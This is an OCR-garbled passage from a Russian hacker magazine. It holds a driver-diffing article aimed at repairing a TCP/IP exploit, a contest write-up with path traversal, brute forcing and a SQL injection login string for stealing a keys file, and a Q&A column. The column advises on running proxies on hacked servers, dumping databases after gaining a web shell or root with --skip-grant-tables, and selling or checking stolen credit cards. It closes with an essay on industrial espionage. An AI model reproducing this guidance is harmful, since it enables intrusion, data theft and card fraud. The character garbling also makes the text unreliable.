зГіг 



есіх, ЮН 



016С99 



есіх 



ЛІЗІ 



01381В 



01 381 Р 



сН, аі 



01381 Р 






013821 



тоѵ [езі+0ЕН],сх 



* ОІСІ.ІЗІ 



01381В 



> Выдирание саЬ-архива из ехе-файла в 
Ніеѵѵ'е'ом 



01381 Р 



глобальных переменных, выдавая множество лож- |)1 381 Е 
ных срабатываний: 013821 






> Исследование ІР-пакетов, 
отправляемых ехріоіі'ом 



Сравнение дизассемблерных листингов 
двух версий ТСРІР.$У$ 



сН, аі 



иное изменение порядка следования ко- 
манд в разных версиях файлов 



А ведь это еще не самое страшное! Поскольку 
в начале каждой строки стоит ее адрес, то при 
«раздвижке» одной или нескольких функций ос- 
тавшаяся часть файла трактуется как «изменен- 
ная», хотя в действительности изменились только 
адреса. Какой же выход? Копируем оісі.ізі в оіб- 
1 .Ізі, загружаем его в РАЯ по <Р4> и, удерживая 
клавишу <АІ_Т> (вместо <ЗНІРТ>), вертикальны- 
ми блоками отрезаем все операнды инструкций 
и адреса, стоящие в начале строки. Аналогичную 
операцию проделываем и над пеѵѵ.ізі В результа- 
те чего получаем два симпатичных файла вида: 



■ 

Пропускаем их через РС с обязательным выводом 
номеров строк (за это отвечает ключ /І\І), иначе мы 
потом не найдем соответствующие им адреса в оІ<± 
ІзѴпеѵѵ.Із! файлах, и с замиранием сердца наблю- 
даем за процессом. Конечно, мы получим много 
ложных срабатываний, уже приведенных в лис- 
тинге 4. Но их очень легко отсеять чисто визуально 
— меняется лишь порядок следования команд, но 
сам шаблон остается неизменным. А вот и первое 
действительное различие: 



[езі+ОЕЬ], сх 0ЮР18 тоѵ сі, [езі+20Рі] , 1 988ВИ 



еальное различие между старой и ноі 



вой 



То же самое происходит и с регистрами: 

Странное изменение выбора регистров в 
разных версиях файлов 



версией драйвера 

024127: 



ШЯ 



024128: 



***** пеѵѵІ.ЬЗТ 



ЩАЛ21 


ГТ І 


(|4128 


саІІ 


(|4129 


тоѵ| 


024130 


стр) 



В прежней версии ТСРІР.ЗУЗ никакого саІІ'а не было! 
А ну-ка заглянем в дизассемблерный текст, открыв 
оісі. ІзѴпеѵѵ.Із! файлы и перейдя к строке 24127. 



I 



тоѵ сЦезі+20Гі], 1988ВГі 



01 РЕ1 Е саІІ РзОеЮиггепІРгосеззІсІ 



I 



саІІ РзОеЮиггепІРгосеззІсІ 



0ЮЕ24 тоѵ [езі+28И], еах 



4 



■ 



тоѵ [езі+28Гі], еах 



I 



саІІ РзОеЮиггепІРгосеззІсІ 
тоѵ [езі+2СІп], Ш 



0ЮЕ27 стр [еЬр+І\ІеѵѵІгдІ], 2 



I 



стр [еЬр+ЫеѵѵІгдІ], 2 



0ЮЕ2В тоѵ [есІІ+8], езі 



I 



тоѵ [есІІ+8], езі 



0ЮЕ2Е ІЬе зГіоП Іос_1 РЕ40 



і 



Ье зіпогііос_ЮЕ48 



01 РЕЗО ризЬ азс_1 РЕ7С; "Ьоск ргоЫетз! !\п" 



ж м 

9 9 



I 



ризЬ азс_1 ОЕ7С;"Еоск ргоЫетз! !\п" 



0ЮЕ35 саІЮЬдРгіпі 



I 



саІІ ОЬдРгіпІ 



01 РЕЗА рор есх 



I 



рор есх 



01 РЕЗВ саІІ ОЬдВгеакРоіпІ 



I 



саІІ ОЬдВгеакРоіпІ 



В старой версии драйвера был только один 
вызов РзОеіСиггепіРгосеззІб, и переменная 
[езі+2СН] оставалась неинициализированной. 
Теперь это исправлено. Аналогичным путем на- 
ходятся и другие различия. Признайтесь, разве 
это неинтересно — узнать, что же реально ис- 
правила МісгозоЙ и где находится источник про- 
блемы. Проанализировавситуацию, мы все-таки 
сможем исправить ехріоіі, заставив его работать 
(копия экрана, подтверждающая это, приводит- 
ся ниже — по понятным соображениям, исправ- 
ленный ехріоіі не распространяется, во всяком 
случае, до тех пор, пока большинство пользова- 
телей не почешутся обновить свою систему). 
Рекомендуется прочитать руководство «Ноѵѵ 
Іо: Нагсіеп Юе ТСР/ІР Зіаск»: тзбп.тісгозоіі. 
сот/ІіЬгагѵ/беІаиІ1.азр?игІ=/ІіЬгагѵ/еп-из/ 
бппеІзес/ИітІ/НТНагбТСР.азр : а также озна- 
комиться с информацией о двух других дырах 
в ТСР/ІР-драйвере, допускающих выполне- 
ние зНеІІ-кода: зесигіЫосиз.сот/Ыб/18325 и 
зесигіМосиз.сот/ЬісІ/І 8374 . □С 
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взлом 



КОНКУРС 



Х-КОНКУ 



СТАРТУЮЩИМ КОНКУРС БУДЕТ СОСТОЯТЬ ИЗ НЕСКОЛЬКИХ ЭТАПОВ. ПРИЧЕМ ПЕРВЫЙ ЭТАП УКАЖЕТ ТЕБЕ ПУТЬ 
К ОСТАЛЬНЫМ. БОЛЬШЕ НИЧЕГО ГОВОРИТЬ НЕ БУДУ — ЗАХОДИ 20-ГО ЧИСЛА НА ЕОВІІМ. ХАКЕР. ВЫ . А Я ПОКА 
РАССКАЖУ, КАК ПРОШЕЛ ПРЕДЫДУЩИЙ КОНКУРС. 




омнишь счетчик посещений на 
главной странице? Это картин- 
ка ѵізі!.рІтр?сІіг=&ітд=ѵізіГрпд. 
Когда заходишь на страницу первый раз, 
скрипт добавляет «.» перед именем кар- 
тинки и напрямую выводит ее контент. Что 
получится, если мы натянем на браузер 
прокси и вызовем ѵізіГрІтр?сІіг=сІо\л/пІоасІз/ 
&ітд=ІИразз\л/сІ? Верно, получим / 
боѵѵпІоабз/.Иіраззѵѵб, который брутим по 
алгоритму тб5. Когда компьютер выду- 
мает верный пароль, мы сможем исполь- 
зовать его, чтобы скачать клиент. Но с 




клиентом нас поджидает облом, так как 
без лицензионного ключа прога пахать не 
будет. Ну и пусть, все равно можно и без 
него обойтись. Просто сканим порты на 
серваке, находим 79-й порт и телнетимся 
к нему. Только вот непонятно, какие коман- 
ды надо вводить, чтобы демон не ругался. 
Одну команду берем из ресурсов проги- 
клиента, другую — со скриншота. Итого 
две команды: «соппесі р2р» и «роз! Не б:\ 
ргіѵа!е\кеуз». До остальных допираем сами, 
кнопки в проге — подсказки. В общем, что- 
бы украсть файл, нужно вводить примерно 



следующие команды: 

Соппесі р2р 

І_одіп а;’ ог Іодіп=’зозізка 
Розі Не б:\ргіѵа!е\кеуз 
ОеНіІе б:\ргіѵа!е\кеуз 

Обрати внимание, что во второй строчке на- 
ходится тузді-іпіесііоп. Если ты выполнил 
все правильно, файл с ключами — у тебя 
в руках. Первым конкурс прошел Дмитрий 
«хЬісІ». Вручаем счастливцу крутую видяху 
МЗІ ЫХ680005. зс 
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О: Испробовал много брутфорсов, но 
ни один из них не хочет перебирать па 
роли по §§Н. Написано, что в Нусіга та- 
кая возможность есть, но при запуске 
переборщика он ругается на какой-то 
модуль. Что посоветуешь? 

А: Ответ очевиден: поставить этот модуль :). 
На самом деле, чтобы переборщик не ругал- 
ся, надо установить библиотеку ІіЬззИ ( ЬНр:/ 
/ОхЬабсОбе.Ье/ІіЬззИ/ІіЬззИ-О.1 1 Лот. ), а затем 
при конфигурации Гидры добавить флаг 
— епаЫе-ІіЬззИ. Стартуем по-новому и видим, 
что все работает как надо! 

І О: Начал писать свой собственный 
движок на РНР. Все нормально, но при 
изменении значений некоторых пара- 
метров скрипт сильно ругается. Кроме 
раскрытия установочных путей, это 
ничем не грозит, однако все же хочет 
ся, чтобы движок работал идеально. 
Можно ли как-нибудь отключить конт 
роль ошибок в РНР? 

А: Чтобы включить отображение ошибок, | 
файле рГір.іпі необходимо найти параметі 
еггог_герогііпд и изменить его значение н; 
Е_АІ_І_. Функция еггог_герогііпд устанавливав' 
уровень отображения ошибок. Если в качестві 
' параметра указать Е_АІ_І_, то будут отображать- 
ся все предупреждения и сообщения. Чтобь| 
отключить сообщения в конкретном сцена- 
рии, нужно написать в его начале следующую' 
строку: еггог_герогііпд(Е_АІ_І_ - (Е_І\ІОТІСЕ + 
Е_ѴѴАВІ\ІІІ\І(3)); 



Если требуется изменить уровень отобра 
жения ошибок для всего сервера, то следует 
отредактировать одноименный параметр в 
файле рГір.іпі. В этом же файле можно найти 
возможные варианты уровней. В случае, когда 
тебе необходимо, чтобы конкретная функция 
не отображала ошибок, перед ее именем нужно 
поставить символ @, например @1ореп(). Хочу 
сразу сказать, что в готовом движке не должно 
быть никаких сообщений об ошибках, так как 
это существенно упрощает работу атакующих. 



кидал — ѵѵѵѵѵѵ.кібаіа.іпіо . Есть и специальный 
ісц-бот (455506). В своей мессаге достаточно 
указать интересующую тебя асю или ник, после 
чего бот вернет ответ. Ну а если так получилось, 
что тебя все же кинули, то обязательно добавь 
риппера в базу кидал — этим ты предупредишь 
других людей. 

Так что будь осторожен и внимателен. Удачной 
работы! 

О: Анонимность в сети для меня явля- 
ется одним из основных вопросов. Но 
после нескольких случаев с утечкой 
логов на крупных сокс-сервисах я стал 
реально опасаться за свою безопас- 
ность. Один из моих знакомых, сказал, 
что лучший вариант — поднять собс- 
твенный сокс/впн на поломанном сер- 
вере. Расскажи подробнее. 

А: Вполне понимаю твои опасения. Доверять 
можно только себе. Поэтому действительно хо- 
роший вариант — поднятие собственного сокса. 
Тем более что сделать это не такуж и трудно. Т ебе 
будет нужен шелл (хватит даже минимальных 
прав) и софт. Рекомендую использовать Ьоипсег 
или Зргоху. Первый существует в трех версиях: 
под ѴѴіпбоѵѵз, І_іпих и ЕгееВЗО. Воипсег не нужно 
компилировать — это готовый бинарник, он не 



О: В последнее время в сети появилось 
много кидал. Некоторые из моих знако- 
мых пострадали. Как обезопасить себя 
от «кидков»? 

А: Данный вопрос волнует почти всех, кто так 
или иначе работает в сети. Бывает, что пытают- 
ся кинуть не на деньги, а на товар (картон, ак- требует специальных привилегий на сервере ; 
каунты и т.д.). Как защитить себя? Во-первых, кроме открытия порта, а все параметры запус- 
старайся работать с проверенными людьми, ка предельно понятны. Я сам использую данную 
создавай свою клиентуру с сотрудничеством софтину на нескольких серверах и полностью ей 
на постоянной основе. Во-вторых, не пренеб- доволен. Зргохѵты можешь найти на зесигііѵ.ппоѵ. 
регай услугами гаранта. Как правило, сделки гц, там же находится и хелп. Данная программа 
до $500 идут под 5-7%, а свыше $500 — под 3%, требует компиляции и обладает достаточно боль- 



на некоторых закрытых форумах услуги гаран- 
та предоставляются под совсем низких процент 
— менее 3%. Так что выбирай и помни: скупой 
платит дважды. Кроме того, если ты неуверен в 
клиенте/партнере, то можешь пробить его ник/ 
і по базе рипперов. Хорошая онлайн-база 
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шим количеством настроек. Запись логов можно 
отключить, указав, например, /беѵ/пиІІ. 






НАСК РАО 



О: Раньше при взломе использовал 
ммлмм.гіотаіпзсІЬ.пеІ для просмотра до- 
менов, находящихся на сервере хос- 
тера. Сейчас сервис недоступен. Не 
знаю, что и делать. Есть ли альтерна- 
тива сІотаіпзсІЬ.пеІ ? 

А: Увы, но сервис действительно закрыт. При- 
чина столь безрадостного события мне не из- 
вестна. Но подозреваю, что кому-то проектявно 
мешал. На данный момент существует аналог 
ресурса — ѵѵѵѵѵѵ.сіотаіпіооіз.сот . После ре- 
гистрации там доступна функция реверса ІР, 
которая позволяет просмотреть список сай- 
тов, принадлежащих определенному ІР-адре- 
су. Кроме того, если верить слухам, то одна из 
андеграунд-команд собирается создать свой 
аналогичный сервис. Подробности пока не 
ясны, но, возможно, появится достойная заме- 
на ботаіпзбЬшеі- 



ни логина, ни пасса. Пароли от фтп не 
подходят. Что делать? 

А: Искать логин и пароль к базе. Если на чтение 
доступны директории пользователей и хватает 
прав на чтение файлов — ищи файлы такого 
Ітвуют свои наработки, которыми они время от типа: сопІід.рИр, сопТід.рІ, сопТрНр, бЬ.рбр, 

| времени делятся с общественностью. Если ты аиШ.рбр, Іодіп.рІ и т.д. Из них можно почерпнуть 
слил именно сырую версию эксплоита, то мо- информацию для доступа к БД, например: 
жешь или доработать ее сам, или подождать 
пока выйдет официальный релиз. 

Я перечислил самые распространенные причи- 
ны. Но хотел бы сказать, что не стоит опускать- 
ся до уровня скрипткидисов, зацикливаясь на 
использовании чужих сплоитов. Ищи уязвимос- 
ти сам, пиши свои релизы, а главное — думай. То есть логин 
прежде чем что-либо делать. Удачи ! 






бЬ_ИозІ = ІосаІИозІ 
бЬ_изег = изег 
бЬ_пате = баіа_Ьазе_изег 
сІЬ_раззѵѵогсІ = дѵѵегіу 



изег, пароль — цѵѵеііу, хост - 
ІосаІИозЦ база — баіа_Ьазе_изег. Коннектишь- 
| ся и делаешь дамп базы ба!а_Ьазе_изег. Если 
О: Планирую заняться изготовлю».. - тебе повезет, то, возможно, твоих прав хватит 



О: У меня постоянная проблема: сли- 
ваю какой-нибудь сплоит, например, 
с зесигіІѵІаЬ.ги или с сайтов хак-групп, 
но он отказывается работать! Делаю 
все правильно, запускаю с нужными 
параметрами, но постоянно появляют- 
ся ошибки. Что я делаю не так? 

А: Очень распространенная проблема среди 
новичков. Причин может быть несколько, поэ- 
тому обо всем по порядку. 

1 . Возможно, ты слил не сам сплоит, а его фейк 
(подделку). Увы, но такие случаи нередки. Бы- 
вает так, что продают якобы Обау ехріоііз, а на 
самом деле — это всего лишь его фейк. Как за- 
щитить себя от кидал, читай выше. Но иногда на 
сайтах хак-групп появляются «сенсационные» 
сплоиты (на самом деле — фейки). Как правило, 
это делается с целью повышения авторитета 
команды, хотя обман достаточно быстро рас- 
крывается. Так что смотри, откуда ты береш 
сплоит. 

2. Следующая возможная причина — ошибки 
в коде эксплоита. Здесь может быть два вари- 
анта: либо это случайные ошибки, допущенные 
в силу форс-мажорных обстоятельств, либо 
— намеренные, созданные программистами с 
целью ограничить число людей, использующих 
сплоит. Для примера рассмотрим эксплоит под 
форум ІРВ <= 2.1.4. В его коде была сделана 
ошибка, о которой в «Хакере» уже писали 
Необходимо было лишь правильно объявить 
переменную — и сплоит становился пригоден 
к использованию. Одним словом, «защита от 
дурака», которых сейчас хватает. 

3. Еще один источник проблем — недописан- 
ный сорец сплоита. У многих команд суще< 



эмулятора для таксофона, но слышал 
от знакомых, что в автоматах встраи- 
вают хитрую защиту на предмет выво- 
да проводов из картоприемника. Прав- 
да ли это? 

А: На 100% утверждать не могу, но пару лет на- 
зад я паял эмулятор — и тогда таксофон кушал 
карточку за милую душу. Да и сейчас защиты, 
скорее всего, нет, потому как происходило бы 
незапланированное срабатывание, например, 
на наручные часы или мобильный телефон, в 
котором ты ищешь номер. Кстати, могу тебе 
посоветовать заглянуть в сообщество НДр:// 
соттипііѵ.ііѵеіоигпаі.сот/ги гасііо еіесіг . где 
можно почерпнуть много информации по теме 
и задать интересующие тебя вопросы. Конкрет- 
но описание таксофонного эмулятора находит- 
ся тут: ИДр://соттипі1у.ІіѵеіоигпаІ.сопп/ги гасііо 
еІес{г/6288.Н{тІ . 

Совершенно случайно мьшгл баз: 
редитных карт одного буржуйского 
нтернет-магазина. Что примечатель- 
ю, карты пока не просрочены. Что с 
іими можно сделать? 

: Самое лучшее решение — удалить :). Ибо 
кардинг — это плохо и наказуемо. А вообще, 
можно продать базу за неплохие деньги (если 
она большая) распространителям картона (их 
/іщи на соответствующих форумах). Еще можно 
амому вбить картон для покупки какого-нибудь 
овара или софта в интернет-магазах. Но пред- 
варительно рекомендую проверить карту на 
валидность. Это делается при помощи специ- 
ільных сервисов или на обычном порносайте, 
оторый предоставит логин и пароль при пра-] 
ильных данных. 

О: Недавно получил веб-шелл на одном 
из серверов. Права — поЬосІу, но часть 
директорий доступна для чтения. 
Очень хочется взглянуть на БД, но нет 



на просмотр всех баз. Что делать в этом случае, | 
я думаю, ты разберешься. 

О: А что делать, если у меня есть рут, но 
нет доступа к Му50І_? Как мне получить 
все базы? 

А: Есть два пути: либо ты сливаешь все баіа- 
файлы нужных тебе баз (например, из /изг/ІіЬ/ 
тузці/баіа), ставишь на своем шелле МуЗОЦ 
заливаешь в свой баіа-каталог украденные 
базы и смотришь их через собственный клиент. 
Однако версия твоей и удаленной СУБД долж- 
на совпадать. Второй путь проще, и мы не раз 
писали его реализацию: убиваешь МуЗОІ_Э и 
запускаешь снова с параметром -зкір-дгапі- 
ІаЫез. Затем сливаешь добро тузцібитр’ом, 
войдя под гооі’ом без пароля, и перезапуска- 
ешь процесс в обычном режиме. Этот прием 
целесообразно делать глубокой ночью и в от- 
сутствие бдящих администраторов :■ 

О: Меня заразили трояном, и я никак 
не могу от него избавиться :(. Трой на- 
ходится в файле с:\ѵѵіпсІоѵѵз\5узІепп\ 
пікегпеІ32.ехе, и я не могу его удалить. 
Ни антивирус, ни попытки убить вирь в 
§аІе Мосіе проблему не решили. Винду 
сносить тоже не хочется. Что можешь 
посоветовать? 

А: Вирмейкеры стали умнее и защищают свои 
троянчики самими изощренными способами. 
Ь мы тоже не лыком шиты. Во-первых, попро- 
буй переименовать файл или записать в него 
любой мусор. Если удастся — активность виру- 
са пропадет (возможно, после перезагрузки ты 
сможешь и удалить его). Не получается? Тогда 
рузись с установочного диска в консоль и уда- 
ляй оттуда. Если даже и это не выходит — приоб- 
рети І_іѵе СЭ любого Біпих-дистрибутива, загру- 
зи его, примонтируй ѴѴіп-систему — и навсегда 
распрощаешься с заразой ! ш 
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МЕТОДЫ ДОБЫЧИ 
СЛУЖЕБНОЙ ИНФОРМАЦИИ’ 

ПРОМЫШЛЕННЫЙ ШПИОНАЖ СУЩЕСТВУЕТ — ЭТО ФАКТ. И ЗАНИМАЮТСЯ ИМ НЕ ТОЛЬКО (И НЕ СТОЛЬКО) КРАСАВЧИКИ 
ВРОДЕ ДЖЕЙМСА БОНДА, НО И ПРОСТЫЕ ХАКЕРЫ, ПРАКТИЧЕСКИ НИКОГДА НЕ ВЫХОДЯЩИЕ ИЗ ДОМА И ВСЕ ДЕЙСТВИЯ 
ОСУЩЕСТВЛЯЮЩИЕ ЧЕРЕЗ СЕТЬ. ИНОГДА— ИЗ ЛЮБОПЫТСТВА, ИНОГДА — ИЗ НЕОБХОДИМОСТИ ИЛИ ЖЕЛАНИЯ 
ПОДЗАРАБОТАТЬ. СТАТЬ ШПИОНОМ МОЖЕТ КАЖДЫЙ, ПРИЧЕМЮОВЕРШЕННО НА ЗАКОННЫХ ОСНОВАНИЯХ! 



Мир очень сильно изменился за последний 
десяток лет, а вместе с ним изменились цели и 
задачи промышленного шпионажа. Уже никто 
не делает секрета из сроков выхода новых про- 
дуктов или их потребительских характеристик, 
как это было во времена ранней молодости МЗ- 
ООЗ, разработчикам которой так и не позволи- 
ли увидеть прототип ІВМ РС. 

Допустим, шпионы смогли выкрасть весь ком- 
плект документации или хотя бы сам образец, 
но. . . что с ним делать? Без соответствующей ин- 
фраструктуры и «носителей знаний» — инже- 
неров, держащих в голове все детали проекта, 
— это просто кипы бумаги" и груда металла, на 
разбор которого уйдет практически столько же 
времени, сколько на независимую разработку. 
Шпионаж и переход на копирование западных 
технологий в конечном счете привел к развалу 
отечественной вычислительной техники, ведь 



даже если выкрасть самый передовой образец, 
то за время «проектирования наоборот» чужая 
инженерная мысль уйдет далеко вперед, а мы 
останемся с носом :). К тому же в СССР все ук- 
раденное у Запада считалось общенародным 
достоянием, и на патенты никто не обращал 
внимания. 

О патентах, корпорациях и ЫОА 

Сейчас же влияние американских корпораций 
на весь прилагающий к ним мир таково, что вы- 
пускать продукцию, уклоняясь оТаЛицензирова- 
ния патентованных технологий, можно только в 
китайском подвале, да и то лишь до того момен- 
та, пока правообладатель не составит исковое 
заявление в суд, что полностью обессмысли- 
вает промышленный шпионаж, поскольку суть 
патентования заключается в раскрытии техно- 
логии в обмен на монопольное право владения. 



То есть, если технология не запатентована и 
удерживается в секрете, всякий кому удастся 
ее раздобыть (например, путем шпионажа или 
обратного проектирования) может беспре- 
пятственно пользоваться ею. Напротив, если 
технология запатентована, то она доступна для 
ознакомления всем желающим (для этого даже 
не придется ничего платить — тексты патентов 
свободно выложены в сети). Но... любая форма 
практического применения (не важно коммер- 
ческая или нет) требует наличия лицензии от 
владельца патента, который в праве запросить 
за нее любые деньги или просто отказать в ли- 
цензировании по «политическим» или марке- 
тинговым соображениям. 

Все, что не патентуется (например, исходные 
тексты программ) можетбыть получено под ША 
(аналог нашей «подписки о неразглашении»), 
легкость получения которой просто поражает 
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ТЕХНИКА ПРОМЫШЛЕННОГО ШПИОНАЖА 




и, по сути, представляет чисто формальную 
процедуру. Было бы большим заблуждением 
считать, что исходные тексты ѴѴіпбоѵѵз пред- 
ставляют огромную тайну, тщательно охраняе- 
мую Місгозоіі. Если МісгозоЙ что-то и охраняет, 
так это распространение, а отнюдь не разгла- 
шение. Получить доступ к исходным текстам че- 
рез І\ЮА — вполне реально. Достаточно вспом- 
нить компанию ѴМѴѴаге, через дырявый сервер 
которой произошла утечка. Благодаря этому 
стечению обстоятельств код ѴѴіпбоѵѵз 2000 стал 
доступен всем желающим. Как бы там ни было, 
прибегать к помощи Джеймса Бонда для этого 
совершенно не обязательно. Легальные пути 
быстрее, эффективнее и надежнее, во всяком 
случае, в теории дела обстоят именно так. А вот 
что нам преподносит реальность... 

Представим себе сотрудника ремонтной мас- 
терской, озабоченного поиском принципиаль- 
ной схемы нового телевизора фирмы 8опу или 
программиста, разрабатывающего драйвер 
для видеокарт производства АТІ под І_ІІ\ІІІХ. И 
хотя ни сервисная документация на телевизор, 
ни техническая спецификация на видеокарту 
сами по себе секретом не являются, получе- 
ние их через официальные каналы упирается 
в бюрократические проволочки, зачастую от- 
нимая гораздо больше времени и усилий, чем 
обратное проектирование. Логически, Зопу 
заинтересована в том, чтобы продать как мож- 
но больше телевизоров (а для этого нужно, 
чтобы их умели ремонтировать, иначе от них 
откажутся как покупатели, так и продавцы). 
АТІ заинтересована в том, чтобы продать как 
можно больше видеокарт, и, хотя она упорно 
игнорирует существование І_ІІ\ІІІХ, не желая 
вкладывать деньги в разработку драйверов, 
глупо упускать возможность, мешая создавать 
драйвера другим. Люди, стоящие у руля, это 
прекрасно понимают, но раздачей специфи- 
каций занимаются не они, а добиться чего-то 
от клерков — практически безнадежное дело. 
То есть через І\ЮА получить спецификации 
вполне возможно, только зачем они нам нуж- 
ны с І\ЮА? 

Потребность в промышленном шпионаже, 
которая существенно снизилась на «высоком 
корпоративном уровне», осталась актуальной 
для отдельных лиц и небольших компаний. И 
вот о ней-то мы и будем говорить! 

Существует не такуж много способов промыш- 
ленного шпионажа, реализуемых через сеть, и 
они далеко не так эффективны, как разведчи- 
ки типа Штирлица, но с вышеописанными зада- 
чами вполне справляются, не вызывая никаких 
конфликтов с законом, что делает их вдвойне 
опаснее! 




Крепость берут изнутри 

Корпоративная политика — это лишь видимая 
часть огромной машины, приводимой в движе- 
ние обыкновенными людьми, которые обща- 
ются друг с другом, обсуждают технические 
проблемы или просто болтают на разные темы, 
посылая куда подальше секретность и прочие 
правила, диктуемые уставом компании. Многие 
задачи решаются совместными усилиями инже- 
неров, работающих в соседних или даже конку- 
рирующих компаниях. Практика показывает, 
что конкуренция внутри компании зачастую 
намного сильнее, чем вне ее. Типичная ситуа- 
ция: инженеру поручили задачу, с которой он 
справиться оказался не в состоянии. Признать- 
ся в этом — означает признать собственную 
некомпетентность. Обратиться за помощью к 
коллегам — так ведь один хрен они помогут, а 
если и помогут, то только ценой продвижения 
своей карьеры за счет других. Как говорится, 
не имей сто рублей, а имей сто друзей, пускай 
даже работающих на другом континенте и зна- 
комых заочно по сети. Все равно любой инже- 
нер, так или иначе, со временем обрастает се- 
тевыми знакомствами. Даже если он не сжигает 
время на форумах, то, по крайней мере, читает 
техническую литературу — книги и статьи, — а 
там, как правило, стоит е-таіі. 

Конечно, люди встречаются самые разные. 
Есть среди них и щедрые, и скупые, и просто 
козлы, из которых ни грамма полезной инфор- 
мации не выдавишь. Но найти демократично 
настроенного человека, увлеченного своим 
делом и ставящего дружбу превыше интере- 
сов компании, — нетрудно. Конечно, наивно 
надеяться, что кто-то запросто так может пе- 
редать полный комплект исходных текстов 
(документации, принципиальных схем), хотя 



бы уже потому, что существует такое понятие, 
как разграничение доступа, и каждый работает 
только с теми частями проекта, в которые его 
«посвятили». Иначе наступит полный бардак, и 
любой обиженный сотрудник сможет завалить 
всю компанию. 

Арабы в таких случаях говорят: «Хочешь про- 
браться к сановнику — сдружись с приврат- 
ником». За неимением привратника сойдет и 
системный администратор. Случай из личной 
жизни. Потребовалось мне как-то раздобыть 
документацию на одно оборудование, которая 
отдаваласьтолькоподІХЮАитолько компаниям- 
членам. Быть членом в мои планы не входило, 
поэтому пришлось ограничиться перепиской 
с системным администратором, на которого я 
вышел через других сотрудников компании — с 
ними познакомился через публичные адреса, 
висящие на сайте. Администратор (как и поло- 
жено) был неразговорчив и мрачен, как обла- 
ка, предвещающие шквал (см. «Предсказание 
погоды по местным признакам», выложенную 
на моем Іір). Дело было совсем не в неразде- 
ленной любви, а в регулярно падающей І\ІТ. Как 
известно, в последних Зегѵісе Раск был ужес- 
точен контроль за ошибками, и освобождение 
уже освобожденной памяти, ранее сходившее 
драйверам с рук, теперь стало вызывать выпа- 
дения в ВЗСЮ. И ведь для нашего же с вами бла- 
га! МісгозоЙ посчитала, что 
лучше остановить 
систему, чем 
позволить 
драйверу 
хими- 
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чить с памятью! Вся проблема в том, что этот 
драйвер управлял сложным аппаратным комп- 
лексом, срок технической поддержки на кото- 
рый уже давно истек, и все, что мог предложить 
его поставщик, — это купить новый аппаратный 
комплекс вместе с новой версией драйвера. 
Стоимость последнего была весьма немалой, к 
тому же он был несовместим с некоторым ис- 
пользуемым оборудованием. 

Отказ от установки Зегѵісе Раск'а решал про- 
блему ВЗСЮ, но оставлял не заткнутыми многие 
дыры, для которых «индивидуальных» заплаток 
не существовало, точнее, эти заплатки влекли 
за собой зависимости, приводящие к смене 
ядра ОС и установке обновленной версии с 
ужесточенным контролем. Служба поддержки 
МісгозоІІ только пожимала плечами — мол, кого 
волнуют чужие проблемы, — и перекладывала 
всю ответственность на разработчиков драйве- 
ра, вина которых была очевидной и неоспори- 
мой, но это не было решением проблемы. Го- 
лубые экраны смерти продолжались, компания 
терпела убытки, администратор получал шиш- 
ки и... тут на сцене появился я :). 

Для меня, какдляхакера, решениебылоочевид- 
ным. Дизассемблировать ядро, найти то место, 
где производится проверка освобождения 
уже освобожденной памяти (а найти его очень 
просто — по перекрестным ссылкам к функции 
КеВидСНекЕх, вызываемой с соответствую- 
щим ЗТОР-кодом), и слегка пропатчить ядро, 
предварительно отключив защиту от записи, 
путем сброса бита ѴѴгіІеРгоІесІ в регистр СРО. 



Я просто предложил несчастному админист- 
ратору переслать по почте его І\ІТКРІ\ІІ_ОЗ.ЕХЕ 
— и буквально через несколько минут выслал 
«исправленный» вариант. И нет! Никакой зара- 
зы, никакого малваре, похищающего пароли, я 
туда не вписал. Вместо этого просто попросил 
свести с людьми, которые могли бы помочь с 
документацией. Вот и все! 

Вы думаете, что коррупция существует толь- 
ко в нашей стране и что, например, в Азии не 
крадут и не берут взяток? Напротив, там это де- 
лают все, нисколько не стесняясь. Вот только 
одна история, рассказанная сотрудником той 
же компании: «При постройке нового цеха, 
проектировщики запросили у метеорологов 
среднегодовую температуру по Таиланду. На 
основании полученных данных была спроек- 
тирована, изготовлена и установлена система 
кондиционирования и вентиляции. И все бы 
ничего, но в «среднегодовой» и «среднетипо- 
вой» температуре обнаружился значительный 
разрыв, особенно хорошо заметный в летнюю 
жару. Стали искать виновных. Метеорологи 
отмазались сразу — мол, что нас спросили, то 
мы и ответили, — а проектировщики упирали на 
то, что ни хрена не разбираются в метеорологи- 
ческих терминах и просто не знают, как, «по на- 
уке» , называется, то, что они имели в виду. Дело 
кончилось тем, что проектировщиков уволили, 
а систему кондиционирования демонтировали, 
перепроектировали и смонтировали заново. 
Вся соль в том, что первая система существо- 
вала только на бумаге, а стоимость фиктивных 



работ по изготовлению/монтажу/демонтажу вы 
себе представляете? Там многим поживиться 
хватило! Но мы отвлеклись. Вернемся к нашим 
баранам. 

В каждой фирме имеется огромная техничес- 
кая библиотека, содержащая до фига всего 
интересного: как документацию на свои собс- 
твенные разработки, так и обширную справоч- 
ную литературу, ставшую уже библиографи- 
ческой редкостью. Тем не менее, раздобыть ее 
очень просто — достаточно уломать одного из 
сотрудников компании пойти туда и чего-то ско- 
пировать. Как правило, эта просьба удовлет- 
воряется, и хотя, с точки зрения руководства, 
является грубым нарушением, ставить руко- 
водство в известность никто не собирается. Как 
вариант, можно сдружиться с отделом верстки 
любого крупного издательства, бесплатно по- 
лучая электронные копии новых книг, которые 
твои друзья тебе беспрепятственно вышлют, 
если будут знать, что дальше тебя они никуда 
не пойдут. 

Закрытую техническую документацию мож- 
но получить через І\ЮА, только обращаться 
за этим надо не через официальные каналы, 
а через знакомых внутри компании, которые 
посоветуют, к кому лучше всего обратиться по 
данному вопросу. Как уже говорилось выше, в 
современном мире технологии защищаются не 
секретами, а патентами, и закрытая докумен- 
тация легко отдается под І\ЮА, если, конечно, 
действовать не через адреса менеджеров, 
вывешенных на сайте, — те и так перегружены 
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позорные, после чего растворяются в сети, как 
утренний туман. 

Что у нас там дальше по списку? Ага, шантаж. 
Дело это грязное и во всех смыслах сильно 
уголовное, но ведь находятся такие козлы, что 
им занимаются, так что приходится быть наго- 
тове. Физической расправой угрожают редко, 
поскольку ее очень трудно осуществить через 
сеть, а еще потому, что с угрозами такого рода 
легко справляется полиция. 

Гораздо хуже, если шантажист намекнет, что 
он может сообщить ревнивой жене об имев- 
шей место измене, против чего не попрешь. И 
в полицию ведь с такой угрозой не пойдешь. Да 
много разных «честных» способов шантажа су- 
ществует. Например, сообщить ребенку о том, 
что он (якобы) совсем не родной, а приемный. В 
переходном возрасте, когда конфликт отцов и 
детей (Тургенева все проходили?) особенно си- 
лен, такой зароненный в душу червь сомнений 
может иметь очень серьезные последствия! Но 
все равно лучше сразу оказать шантажисту со- 
противление, чем идти у него на поводу, наде- 
ясь, что после выполнения всехего требований, 



